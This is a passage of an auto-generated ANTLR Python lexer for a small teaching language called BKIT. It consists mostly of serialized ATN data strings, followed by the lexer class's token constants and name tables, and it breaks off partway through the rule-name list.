buf.write(\"\\3\\2\\2\\2\\2\\u00a1\\3\\2\\2\\2\\2\\u00a3\\3\\2\\2\\2\\2\\u00a5\\3\\2\\2\")\n 
buf.write(\"\\2\\2\\u00a7\\3\\2\\2\\2\\3\\u00a9\\3\\2\\2\\2\\5\\u00ac\\3\\2\\2\\2\\7\\u00b4\")\n buf.write(\"\\3\\2\\2\\2\\t\\u00bd\\3\\2\\2\\2\\13\\u00c9\\3\\2\\2\\2\\r\\u00d7\\3\\2\")\n buf.write(\"\\2\\2\\17\\u00e2\\3\\2\\2\\2\\21\\u00e5\\3\\2\\2\\2\\23\\u00eb\\3\\2\\2\")\n buf.write(\"\\2\\25\\u00ed\\3\\2\\2\\2\\27\\u00ef\\3\\2\\2\\2\\31\\u00f3\\3\\2\\2\\2\")\n buf.write(\"\\33\\u00f6\\3\\2\\2\\2\\35\\u00f8\\3\\2\\2\\2\\37\\u00ff\\3\\2\\2\\2!\\u0107\")\n buf.write(\"\\3\\2\\2\\2#\\u0112\\3\\2\\2\\2%\\u0115\\3\\2\\2\\2\\'\\u0118\\3\\2\\2\\2\")\n buf.write(\")\\u011e\\3\\2\\2\\2+\\u0120\\3\\2\\2\\2-\\u0122\\3\\2\\2\\2/\\u0128\\3\")\n buf.write(\"\\2\\2\\2\\61\\u0130\\3\\2\\2\\2\\63\\u0138\\3\\2\\2\\2\\65\\u0142\\3\\2\")\n buf.write(\"\\2\\2\\67\\u0144\\3\\2\\2\\29\\u0148\\3\\2\\2\\2;\\u014a\\3\\2\\2\\2=\\u0154\")\n buf.write(\"\\3\\2\\2\\2?\\u0159\\3\\2\\2\\2A\\u015f\\3\\2\\2\\2C\\u0168\\3\\2\\2\\2\")\n buf.write(\"E\\u016b\\3\\2\\2\\2G\\u0170\\3\\2\\2\\2I\\u0177\\3\\2\\2\\2K\\u017e\\3\")\n buf.write(\"\\2\\2\\2M\\u0184\\3\\2\\2\\2O\\u018b\\3\\2\\2\\2Q\\u0194\\3\\2\\2\\2S\\u0198\")\n buf.write(\"\\3\\2\\2\\2U\\u01a1\\3\\2\\2\\2W\\u01a4\\3\\2\\2\\2Y\\u01ae\\3\\2\\2\\2\")\n buf.write(\"[\\u01b5\\3\\2\\2\\2]\\u01ba\\3\\2\\2\\2_\\u01be\\3\\2\\2\\2a\\u01c4\\3\")\n buf.write(\"\\2\\2\\2c\\u01c9\\3\\2\\2\\2e\\u01cf\\3\\2\\2\\2g\\u01d5\\3\\2\\2\\2i\\u01d7\")\n buf.write(\"\\3\\2\\2\\2k\\u01da\\3\\2\\2\\2m\\u01dc\\3\\2\\2\\2o\\u01df\\3\\2\\2\\2\")\n buf.write(\"q\\u01e1\\3\\2\\2\\2s\\u01e4\\3\\2\\2\\2u\\u01e6\\3\\2\\2\\2w\\u01e9\\3\")\n buf.write(\"\\2\\2\\2y\\u01eb\\3\\2\\2\\2{\\u01ed\\3\\2\\2\\2}\\u01f0\\3\\2\\2\\2\\177\")\n buf.write(\"\\u01f3\\3\\2\\2\\2\\u0081\\u01f6\\3\\2\\2\\2\\u0083\\u01f9\\3\\2\\2\\2\")\n buf.write(\"\\u0085\\u01fb\\3\\2\\2\\2\\u0087\\u01fd\\3\\2\\2\\2\\u0089\\u0200\\3\")\n buf.write(\"\\2\\2\\2\\u008b\\u0203\\3\\2\\2\\2\\u008d\\u0207\\3\\2\\2\\2\\u008f\\u020a\")\n 
buf.write(\"\\3\\2\\2\\2\\u0091\\u020d\\3\\2\\2\\2\\u0093\\u0211\\3\\2\\2\\2\\u0095\")\n buf.write(\"\\u0215\\3\\2\\2\\2\\u0097\\u0217\\3\\2\\2\\2\\u0099\\u0219\\3\\2\\2\\2\")\n buf.write(\"\\u009b\\u021b\\3\\2\\2\\2\\u009d\\u021d\\3\\2\\2\\2\\u009f\\u021f\\3\")\n buf.write(\"\\2\\2\\2\\u00a1\\u0221\\3\\2\\2\\2\\u00a3\\u0223\\3\\2\\2\\2\\u00a5\\u0225\")\n buf.write(\"\\3\\2\\2\\2\\u00a7\\u0227\\3\\2\\2\\2\\u00a9\\u00aa\\5\\33\\16\\2\\u00aa\")\n buf.write(\"\\u00ab\\5!\\21\\2\\u00ab\\4\\3\\2\\2\\2\\u00ac\\u00b1\\5\\23\\n\\2\\u00ad\")\n buf.write(\"\\u00b0\\5\\23\\n\\2\\u00ae\\u00b0\\5\\27\\f\\2\\u00af\\u00ad\\3\\2\\2\")\n buf.write(\"\\2\\u00af\\u00ae\\3\\2\\2\\2\\u00b0\\u00b3\\3\\2\\2\\2\\u00b1\\u00af\")\n buf.write(\"\\3\\2\\2\\2\\u00b1\\u00b2\\3\\2\\2\\2\\u00b2\\6\\3\\2\\2\\2\\u00b3\\u00b1\")\n buf.write(\"\\3\\2\\2\\2\\u00b4\\u00b8\\7$\\2\\2\\u00b5\\u00b7\\5)\\25\\2\\u00b6\")\n buf.write(\"\\u00b5\\3\\2\\2\\2\\u00b7\\u00ba\\3\\2\\2\\2\\u00b8\\u00b6\\3\\2\\2\\2\")\n buf.write(\"\\u00b8\\u00b9\\3\\2\\2\\2\\u00b9\\u00bb\\3\\2\\2\\2\\u00ba\\u00b8\\3\")\n buf.write(\"\\2\\2\\2\\u00bb\\u00bc\\5#\\22\\2\\u00bc\\b\\3\\2\\2\\2\\u00bd\\u00c1\")\n buf.write(\"\\7$\\2\\2\\u00be\\u00c0\\5)\\25\\2\\u00bf\\u00be\\3\\2\\2\\2\\u00c0\")\n buf.write(\"\\u00c3\\3\\2\\2\\2\\u00c1\\u00bf\\3\\2\\2\\2\\u00c1\\u00c2\\3\\2\\2\\2\")\n buf.write(\"\\u00c2\\u00c5\\3\\2\\2\\2\\u00c3\\u00c1\\3\\2\\2\\2\\u00c4\\u00c6\\t\")\n buf.write(\"\\2\\2\\2\\u00c5\\u00c4\\3\\2\\2\\2\\u00c6\\u00c7\\3\\2\\2\\2\\u00c7\\u00c8\")\n buf.write(\"\\b\\5\\2\\2\\u00c8\\n\\3\\2\\2\\2\\u00c9\\u00ca\\7,\\2\\2\\u00ca\\u00cb\")\n buf.write(\"\\7,\\2\\2\\u00cb\\u00cf\\3\\2\\2\\2\\u00cc\\u00ce\\13\\2\\2\\2\\u00cd\")\n buf.write(\"\\u00cc\\3\\2\\2\\2\\u00ce\\u00d1\\3\\2\\2\\2\\u00cf\\u00d0\\3\\2\\2\\2\")\n buf.write(\"\\u00cf\\u00cd\\3\\2\\2\\2\\u00d0\\u00d2\\3\\2\\2\\2\\u00d1\\u00cf\\3\")\n buf.write(\"\\2\\2\\2\\u00d2\\u00d3\\7,\\2\\2\\u00d3\\u00d4\\7,\\2\\2\\u00d4\\u00d5\")\n 
buf.write(\"\\3\\2\\2\\2\\u00d5\\u00d6\\b\\6\\3\\2\\u00d6\\f\\3\\2\\2\\2\\u00d7\\u00d8\")\n buf.write(\"\\7,\\2\\2\\u00d8\\u00d9\\7,\\2\\2\\u00d9\\u00dd\\3\\2\\2\\2\\u00da\\u00dc\")\n buf.write(\"\\13\\2\\2\\2\\u00db\\u00da\\3\\2\\2\\2\\u00dc\\u00df\\3\\2\\2\\2\\u00dd\")\n buf.write(\"\\u00de\\3\\2\\2\\2\\u00dd\\u00db\\3\\2\\2\\2\\u00de\\u00e0\\3\\2\\2\\2\")\n buf.write(\"\\u00df\\u00dd\\3\\2\\2\\2\\u00e0\\u00e1\\7\\2\\2\\3\\u00e1\\16\\3\\2\")\n buf.write(\"\\2\\2\\u00e2\\u00e3\\t\\3\\2\\2\\u00e3\\20\\3\\2\\2\\2\\u00e4\\u00e6\")\n buf.write(\"\\t\\4\\2\\2\\u00e5\\u00e4\\3\\2\\2\\2\\u00e6\\u00e7\\3\\2\\2\\2\\u00e7\")\n buf.write(\"\\u00e5\\3\\2\\2\\2\\u00e7\\u00e8\\3\\2\\2\\2\\u00e8\\u00e9\\3\\2\\2\\2\")\n buf.write(\"\\u00e9\\u00ea\\b\\t\\3\\2\\u00ea\\22\\3\\2\\2\\2\\u00eb\\u00ec\\t\\5\")\n buf.write(\"\\2\\2\\u00ec\\24\\3\\2\\2\\2\\u00ed\\u00ee\\t\\6\\2\\2\\u00ee\\26\\3\\2\")\n buf.write(\"\\2\\2\\u00ef\\u00f0\\t\\7\\2\\2\\u00f0\\30\\3\\2\\2\\2\\u00f1\\u00f4\")\n buf.write(\"\\5\\23\\n\\2\\u00f2\\u00f4\\5\\25\\13\\2\\u00f3\\u00f1\\3\\2\\2\\2\\u00f3\")\n buf.write(\"\\u00f2\\3\\2\\2\\2\\u00f4\\32\\3\\2\\2\\2\\u00f5\\u00f7\\t\\b\\2\\2\\u00f6\")\n buf.write(\"\\u00f5\\3\\2\\2\\2\\u00f6\\u00f7\\3\\2\\2\\2\\u00f7\\34\\3\\2\\2\\2\\u00f8\")\n buf.write(\"\\u00f9\\t\\t\\2\\2\\u00f9\\u00fb\\5\\33\\16\\2\\u00fa\\u00fc\\5\\27\")\n buf.write(\"\\f\\2\\u00fb\\u00fa\\3\\2\\2\\2\\u00fc\\u00fd\\3\\2\\2\\2\\u00fd\\u00fb\")\n buf.write(\"\\3\\2\\2\\2\\u00fd\\u00fe\\3\\2\\2\\2\\u00fe\\36\\3\\2\\2\\2\\u00ff\\u0103\")\n buf.write(\"\\t\\n\\2\\2\\u0100\\u0102\\5\\27\\f\\2\\u0101\\u0100\\3\\2\\2\\2\\u0102\")\n buf.write(\"\\u0105\\3\\2\\2\\2\\u0103\\u0101\\3\\2\\2\\2\\u0103\\u0104\\3\\2\\2\\2\")\n buf.write(\"\\u0104 \\3\\2\\2\\2\\u0105\\u0103\\3\\2\\2\\2\\u0106\\u0108\\5\\27\\f\")\n buf.write(\"\\2\\u0107\\u0106\\3\\2\\2\\2\\u0108\\u0109\\3\\2\\2\\2\\u0109\\u0107\")\n buf.write(\"\\3\\2\\2\\2\\u0109\\u010a\\3\\2\\2\\2\\u010a\\u0110\\3\\2\\2\\2\\u010b\")\n 
buf.write(\"\\u010d\\5\\37\\20\\2\\u010c\\u010e\\5\\35\\17\\2\\u010d\\u010c\\3\\2\")\n buf.write(\"\\2\\2\\u010d\\u010e\\3\\2\\2\\2\\u010e\\u0111\\3\\2\\2\\2\\u010f\\u0111\")\n buf.write(\"\\5\\35\\17\\2\\u0110\\u010b\\3\\2\\2\\2\\u0110\\u010f\\3\\2\\2\\2\\u0111\")\n buf.write(\"\\\"\\3\\2\\2\\2\\u0112\\u0113\\7^\\2\\2\\u0113\\u0114\\n\\13\\2\\2\\u0114\")\n buf.write(\"$\\3\\2\\2\\2\\u0115\\u0116\\7^\\2\\2\\u0116\\u0117\\t\\13\\2\\2\\u0117\")\n buf.write(\"&\\3\\2\\2\\2\\u0118\\u0119\\7)\\2\\2\\u0119\\u011a\\7$\\2\\2\\u011a\")\n buf.write(\"(\\3\\2\\2\\2\\u011b\\u011f\\n\\f\\2\\2\\u011c\\u011f\\5%\\23\\2\\u011d\")\n buf.write(\"\\u011f\\5\\'\\24\\2\\u011e\\u011b\\3\\2\\2\\2\\u011e\\u011c\\3\\2\\2\")\n buf.write(\"\\2\\u011e\\u011d\\3\\2\\2\\2\\u011f*\\3\\2\\2\\2\\u0120\\u0121\\t\\r\")\n buf.write(\"\\2\\2\\u0121,\\3\\2\\2\\2\\u0122\\u0123\\t\\16\\2\\2\\u0123.\\3\\2\\2\")\n buf.write(\"\\2\\u0124\\u0125\\7\\62\\2\\2\\u0125\\u0129\\7z\\2\\2\\u0126\\u0127\")\n buf.write(\"\\7\\62\\2\\2\\u0127\\u0129\\7Z\\2\\2\\u0128\\u0124\\3\\2\\2\\2\\u0128\")\n buf.write(\"\\u0126\\3\\2\\2\\2\\u0129\\u012b\\3\\2\\2\\2\\u012a\\u012c\\5+\\26\\2\")\n buf.write(\"\\u012b\\u012a\\3\\2\\2\\2\\u012c\\u012d\\3\\2\\2\\2\\u012d\\u012b\\3\")\n buf.write(\"\\2\\2\\2\\u012d\\u012e\\3\\2\\2\\2\\u012e\\60\\3\\2\\2\\2\\u012f\\u0131\")\n buf.write(\"\\5\\27\\f\\2\\u0130\\u012f\\3\\2\\2\\2\\u0131\\u0132\\3\\2\\2\\2\\u0132\")\n buf.write(\"\\u0130\\3\\2\\2\\2\\u0132\\u0133\\3\\2\\2\\2\\u0133\\62\\3\\2\\2\\2\\u0134\")\n buf.write(\"\\u0135\\7\\62\\2\\2\\u0135\\u0139\\7q\\2\\2\\u0136\\u0137\\7\\62\\2\")\n buf.write(\"\\2\\u0137\\u0139\\7Q\\2\\2\\u0138\\u0134\\3\\2\\2\\2\\u0138\\u0136\")\n buf.write(\"\\3\\2\\2\\2\\u0139\\u013b\\3\\2\\2\\2\\u013a\\u013c\\5-\\27\\2\\u013b\")\n buf.write(\"\\u013a\\3\\2\\2\\2\\u013c\\u013d\\3\\2\\2\\2\\u013d\\u013b\\3\\2\\2\\2\")\n buf.write(\"\\u013d\\u013e\\3\\2\\2\\2\\u013e\\64\\3\\2\\2\\2\\u013f\\u0143\\5\\61\")\n 
buf.write(\"\\31\\2\\u0140\\u0143\\5/\\30\\2\\u0141\\u0143\\5\\63\\32\\2\\u0142\")\n buf.write(\"\\u013f\\3\\2\\2\\2\\u0142\\u0140\\3\\2\\2\\2\\u0142\\u0141\\3\\2\\2\\2\")\n buf.write(\"\\u0143\\66\\3\\2\\2\\2\\u0144\\u0145\\5!\\21\\2\\u01458\\3\\2\\2\\2\\u0146\")\n buf.write(\"\\u0149\\5a\\61\\2\\u0147\\u0149\\5c\\62\\2\\u0148\\u0146\\3\\2\\2\\2\")\n buf.write(\"\\u0148\\u0147\\3\\2\\2\\2\\u0149:\\3\\2\\2\\2\\u014a\\u014e\\7$\\2\\2\")\n buf.write(\"\\u014b\\u014d\\5)\\25\\2\\u014c\\u014b\\3\\2\\2\\2\\u014d\\u0150\\3\")\n buf.write(\"\\2\\2\\2\\u014e\\u014c\\3\\2\\2\\2\\u014e\\u014f\\3\\2\\2\\2\\u014f\\u0151\")\n buf.write(\"\\3\\2\\2\\2\\u0150\\u014e\\3\\2\\2\\2\\u0151\\u0152\\7$\\2\\2\\u0152\")\n buf.write(\"\\u0153\\b\\36\\4\\2\\u0153<\\3\\2\\2\\2\\u0154\\u0155\\7D\\2\\2\\u0155\")\n buf.write(\"\\u0156\\7q\\2\\2\\u0156\\u0157\\7f\\2\\2\\u0157\\u0158\\7{\\2\\2\\u0158\")\n buf.write(\">\\3\\2\\2\\2\\u0159\\u015a\\7D\\2\\2\\u015a\\u015b\\7t\\2\\2\\u015b\")\n buf.write(\"\\u015c\\7g\\2\\2\\u015c\\u015d\\7c\\2\\2\\u015d\\u015e\\7m\\2\\2\\u015e\")\n buf.write(\"@\\3\\2\\2\\2\\u015f\\u0160\\7E\\2\\2\\u0160\\u0161\\7q\\2\\2\\u0161\")\n buf.write(\"\\u0162\\7p\\2\\2\\u0162\\u0163\\7v\\2\\2\\u0163\\u0164\\7k\\2\\2\\u0164\")\n buf.write(\"\\u0165\\7p\\2\\2\\u0165\\u0166\\7w\\2\\2\\u0166\\u0167\\7g\\2\\2\\u0167\")\n buf.write(\"B\\3\\2\\2\\2\\u0168\\u0169\\7F\\2\\2\\u0169\\u016a\\7q\\2\\2\\u016a\")\n buf.write(\"D\\3\\2\\2\\2\\u016b\\u016c\\7G\\2\\2\\u016c\\u016d\\7n\\2\\2\\u016d\")\n buf.write(\"\\u016e\\7u\\2\\2\\u016e\\u016f\\7g\\2\\2\\u016fF\\3\\2\\2\\2\\u0170\")\n buf.write(\"\\u0171\\7G\\2\\2\\u0171\\u0172\\7n\\2\\2\\u0172\\u0173\\7U\\2\\2\\u0173\")\n buf.write(\"\\u0174\\7g\\2\\2\\u0174\\u0175\\7n\\2\\2\\u0175\\u0176\\7h\\2\\2\\u0176\")\n buf.write(\"H\\3\\2\\2\\2\\u0177\\u0178\\7G\\2\\2\\u0178\\u0179\\7n\\2\\2\\u0179\")\n buf.write(\"\\u017a\\7u\\2\\2\\u017a\\u017b\\7g\\2\\2\\u017b\\u017c\\7K\\2\\2\\u017c\")\n 
buf.write(\"\\u017d\\7h\\2\\2\\u017dJ\\3\\2\\2\\2\\u017e\\u017f\\7G\\2\\2\\u017f\")\n buf.write(\"\\u0180\\7p\\2\\2\\u0180\\u0181\\7f\\2\\2\\u0181\\u0182\\7K\\2\\2\\u0182\")\n buf.write(\"\\u0183\\7h\\2\\2\\u0183L\\3\\2\\2\\2\\u0184\\u0185\\7G\\2\\2\\u0185\")\n buf.write(\"\\u0186\\7p\\2\\2\\u0186\\u0187\\7f\\2\\2\\u0187\\u0188\\7H\\2\\2\\u0188\")\n buf.write(\"\\u0189\\7q\\2\\2\\u0189\\u018a\\7t\\2\\2\\u018aN\\3\\2\\2\\2\\u018b\")\n buf.write(\"\\u018c\\7G\\2\\2\\u018c\\u018d\\7p\\2\\2\\u018d\\u018e\\7f\\2\\2\\u018e\")\n buf.write(\"\\u018f\\7Y\\2\\2\\u018f\\u0190\\7j\\2\\2\\u0190\\u0191\\7k\\2\\2\\u0191\")\n buf.write(\"\\u0192\\7n\\2\\2\\u0192\\u0193\\7g\\2\\2\\u0193P\\3\\2\\2\\2\\u0194\")\n buf.write(\"\\u0195\\7H\\2\\2\\u0195\\u0196\\7q\\2\\2\\u0196\\u0197\\7t\\2\\2\\u0197\")\n buf.write(\"R\\3\\2\\2\\2\\u0198\\u0199\\7H\\2\\2\\u0199\\u019a\\7w\\2\\2\\u019a\")\n buf.write(\"\\u019b\\7p\\2\\2\\u019b\\u019c\\7e\\2\\2\\u019c\\u019d\\7v\\2\\2\\u019d\")\n buf.write(\"\\u019e\\7k\\2\\2\\u019e\\u019f\\7q\\2\\2\\u019f\\u01a0\\7p\\2\\2\\u01a0\")\n buf.write(\"T\\3\\2\\2\\2\\u01a1\\u01a2\\7K\\2\\2\\u01a2\\u01a3\\7h\\2\\2\\u01a3\")\n buf.write(\"V\\3\\2\\2\\2\\u01a4\\u01a5\\7R\\2\\2\\u01a5\\u01a6\\7c\\2\\2\\u01a6\")\n buf.write(\"\\u01a7\\7t\\2\\2\\u01a7\\u01a8\\7c\\2\\2\\u01a8\\u01a9\\7o\\2\\2\\u01a9\")\n buf.write(\"\\u01aa\\7g\\2\\2\\u01aa\\u01ab\\7v\\2\\2\\u01ab\\u01ac\\7g\\2\\2\\u01ac\")\n buf.write(\"\\u01ad\\7t\\2\\2\\u01adX\\3\\2\\2\\2\\u01ae\\u01af\\7T\\2\\2\\u01af\")\n buf.write(\"\\u01b0\\7g\\2\\2\\u01b0\\u01b1\\7v\\2\\2\\u01b1\\u01b2\\7w\\2\\2\\u01b2\")\n buf.write(\"\\u01b3\\7t\\2\\2\\u01b3\\u01b4\\7p\\2\\2\\u01b4Z\\3\\2\\2\\2\\u01b5\")\n buf.write(\"\\u01b6\\7V\\2\\2\\u01b6\\u01b7\\7j\\2\\2\\u01b7\\u01b8\\7g\\2\\2\\u01b8\")\n buf.write(\"\\u01b9\\7p\\2\\2\\u01b9\\\\\\3\\2\\2\\2\\u01ba\\u01bb\\7X\\2\\2\\u01bb\")\n buf.write(\"\\u01bc\\7c\\2\\2\\u01bc\\u01bd\\7t\\2\\2\\u01bd^\\3\\2\\2\\2\\u01be\")\n 
buf.write(\"\\u01bf\\7Y\\2\\2\\u01bf\\u01c0\\7j\\2\\2\\u01c0\\u01c1\\7k\\2\\2\\u01c1\")\n buf.write(\"\\u01c2\\7n\\2\\2\\u01c2\\u01c3\\7g\\2\\2\\u01c3`\\3\\2\\2\\2\\u01c4\")\n buf.write(\"\\u01c5\\7V\\2\\2\\u01c5\\u01c6\\7t\\2\\2\\u01c6\\u01c7\\7w\\2\\2\\u01c7\")\n buf.write(\"\\u01c8\\7g\\2\\2\\u01c8b\\3\\2\\2\\2\\u01c9\\u01ca\\7H\\2\\2\\u01ca\")\n buf.write(\"\\u01cb\\7c\\2\\2\\u01cb\\u01cc\\7n\\2\\2\\u01cc\\u01cd\\7u\\2\\2\\u01cd\")\n buf.write(\"\\u01ce\\7g\\2\\2\\u01ced\\3\\2\\2\\2\\u01cf\\u01d0\\7G\\2\\2\\u01d0\")\n buf.write(\"\\u01d1\\7p\\2\\2\\u01d1\\u01d2\\7f\\2\\2\\u01d2\\u01d3\\7F\\2\\2\\u01d3\")\n buf.write(\"\\u01d4\\7q\\2\\2\\u01d4f\\3\\2\\2\\2\\u01d5\\u01d6\\7-\\2\\2\\u01d6\")\n buf.write(\"h\\3\\2\\2\\2\\u01d7\\u01d8\\7-\\2\\2\\u01d8\\u01d9\\7\\60\\2\\2\\u01d9\")\n buf.write(\"j\\3\\2\\2\\2\\u01da\\u01db\\7/\\2\\2\\u01dbl\\3\\2\\2\\2\\u01dc\\u01dd\")\n buf.write(\"\\7/\\2\\2\\u01dd\\u01de\\7\\60\\2\\2\\u01den\\3\\2\\2\\2\\u01df\\u01e0\")\n buf.write(\"\\7,\\2\\2\\u01e0p\\3\\2\\2\\2\\u01e1\\u01e2\\7,\\2\\2\\u01e2\\u01e3\")\n buf.write(\"\\7\\60\\2\\2\\u01e3r\\3\\2\\2\\2\\u01e4\\u01e5\\7^\\2\\2\\u01e5t\\3\\2\")\n buf.write(\"\\2\\2\\u01e6\\u01e7\\7^\\2\\2\\u01e7\\u01e8\\7\\60\\2\\2\\u01e8v\\3\")\n buf.write(\"\\2\\2\\2\\u01e9\\u01ea\\7\\'\\2\\2\\u01eax\\3\\2\\2\\2\\u01eb\\u01ec\")\n buf.write(\"\\7#\\2\\2\\u01ecz\\3\\2\\2\\2\\u01ed\\u01ee\\7(\\2\\2\\u01ee\\u01ef\")\n buf.write(\"\\7(\\2\\2\\u01ef|\\3\\2\\2\\2\\u01f0\\u01f1\\7~\\2\\2\\u01f1\\u01f2\")\n buf.write(\"\\7~\\2\\2\\u01f2~\\3\\2\\2\\2\\u01f3\\u01f4\\7?\\2\\2\\u01f4\\u01f5\")\n buf.write(\"\\7?\\2\\2\\u01f5\\u0080\\3\\2\\2\\2\\u01f6\\u01f7\\7#\\2\\2\\u01f7\\u01f8\")\n buf.write(\"\\7?\\2\\2\\u01f8\\u0082\\3\\2\\2\\2\\u01f9\\u01fa\\7>\\2\\2\\u01fa\\u0084\")\n buf.write(\"\\3\\2\\2\\2\\u01fb\\u01fc\\7@\\2\\2\\u01fc\\u0086\\3\\2\\2\\2\\u01fd\")\n buf.write(\"\\u01fe\\7>\\2\\2\\u01fe\\u01ff\\7?\\2\\2\\u01ff\\u0088\\3\\2\\2\\2\\u0200\")\n 
buf.write(\"\\u0201\\7@\\2\\2\\u0201\\u0202\\7?\\2\\2\\u0202\\u008a\\3\\2\\2\\2\\u0203\")\n buf.write(\"\\u0204\\7?\\2\\2\\u0204\\u0205\\7^\\2\\2\\u0205\\u0206\\7?\\2\\2\\u0206\")\n buf.write(\"\\u008c\\3\\2\\2\\2\\u0207\\u0208\\7>\\2\\2\\u0208\\u0209\\7\\60\\2\\2\")\n buf.write(\"\\u0209\\u008e\\3\\2\\2\\2\\u020a\\u020b\\7@\\2\\2\\u020b\\u020c\\7\")\n buf.write(\"\\60\\2\\2\\u020c\\u0090\\3\\2\\2\\2\\u020d\\u020e\\7>\\2\\2\\u020e\\u020f\")\n buf.write(\"\\7?\\2\\2\\u020f\\u0210\\7\\60\\2\\2\\u0210\\u0092\\3\\2\\2\\2\\u0211\")\n buf.write(\"\\u0212\\7@\\2\\2\\u0212\\u0213\\7?\\2\\2\\u0213\\u0214\\7\\60\\2\\2\")\n buf.write(\"\\u0214\\u0094\\3\\2\\2\\2\\u0215\\u0216\\7*\\2\\2\\u0216\\u0096\\3\")\n buf.write(\"\\2\\2\\2\\u0217\\u0218\\7+\\2\\2\\u0218\\u0098\\3\\2\\2\\2\\u0219\\u021a\")\n buf.write(\"\\7]\\2\\2\\u021a\\u009a\\3\\2\\2\\2\\u021b\\u021c\\7_\\2\\2\\u021c\\u009c\")\n buf.write(\"\\3\\2\\2\\2\\u021d\\u021e\\7}\\2\\2\\u021e\\u009e\\3\\2\\2\\2\\u021f\")\n buf.write(\"\\u0220\\7\\177\\2\\2\\u0220\\u00a0\\3\\2\\2\\2\\u0221\\u0222\\7<\\2\")\n buf.write(\"\\2\\u0222\\u00a2\\3\\2\\2\\2\\u0223\\u0224\\7\\60\\2\\2\\u0224\\u00a4\")\n buf.write(\"\\3\\2\\2\\2\\u0225\\u0226\\7=\\2\\2\\u0226\\u00a6\\3\\2\\2\\2\\u0227\")\n buf.write(\"\\u0228\\7.\\2\\2\\u0228\\u00a8\\3\\2\\2\\2\\33\\2\\u00af\\u00b1\\u00b8\")\n buf.write(\"\\u00c1\\u00c5\\u00cf\\u00dd\\u00e7\\u00f3\\u00f6\\u00fd\\u0103\")\n buf.write(\"\\u0109\\u010d\\u0110\\u011e\\u0128\\u012d\\u0132\\u0138\\u013d\")\n buf.write(\"\\u0142\\u0148\\u014e\\5\\3\\5\\2\\b\\2\\2\\3\\36\\3\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n REAL_NUMBER = 1\n ID = 2\n ILLEGAL_ESCAPE = 3\n UNCLOSE_STRING = 4\n COMMENT = 5\n UNTERMINATED_COMMENT = 6\n ERROR_CHAR = 7\n WS = 8\n Integer_literal = 9\n Float_literal = 10\n Boolean_literal = 11\n String_literal = 12\n BODY = 13\n BREAK = 14\n 
CONTINUE = 15\n DO = 16\n ELSE = 17\n ELSELF = 18\n ELSEIF = 19\n ENDBODY = 20\n ENDFOR = 21\n ENDWHILE = 22\n FOR = 23\n FUNCTION = 24\n IF = 25\n PARAMETER = 26\n RETURN = 27\n THEN = 28\n VAR = 29\n WHILE = 30\n TRUE = 31\n FALSE = 32\n ENDDO = 33\n PLUS_INT = 34\n PLUS_FLOAT = 35\n MINUS_INT = 36\n MINUS_FLOAT = 37\n STAR_INT = 38\n STAR_FLOAT = 39\n DIV_INT = 40\n DIV_FLOAT = 41\n MOD = 42\n NOT = 43\n AND = 44\n OR = 45\n EQUAL = 46\n NOT_EQUAL_INT = 47\n LESS_INT = 48\n GREATER_INT = 49\n LESS_OR_EQUAL_INT = 50\n GREATER_OR_EQUAL_INT = 51\n NOT_EQUAL_FLOAT = 52\n LESS_FLOAT = 53\n GREATER_FLOAT = 54\n LESS_OR_EQUAL_FLOAT = 55\n GREATER_OR_EQUAL_FLOAT = 56\n LEFT_PAREN = 57\n RIGHT_PARENT = 58\n LEFT_BRACKET = 59\n RIGHT_BRACKET = 60\n LEFT_BRACE = 61\n RIGHT_BRACE = 62\n COLON = 63\n DOT = 64\n SEMI = 65\n COMMA = 66\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \"'ElSelf'\", \n \"'ElseIf'\", \"'EndIf'\", \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \n \"'If'\", \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \n \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \n \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \"'=\\\\='\", \"'<.'\", \n \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \n \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \n \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \"Integer_literal\", \n \"Float_literal\", \"Boolean_literal\", \"String_literal\", \"BODY\", \n \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", 
\"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \n \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \n \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PARENT\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\" ]\n\n ruleNames = [ \"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \n \"COMMENT\", \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \n \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \"LETTER\", \n \"SIGN\", \"SCIENTIFIC\", 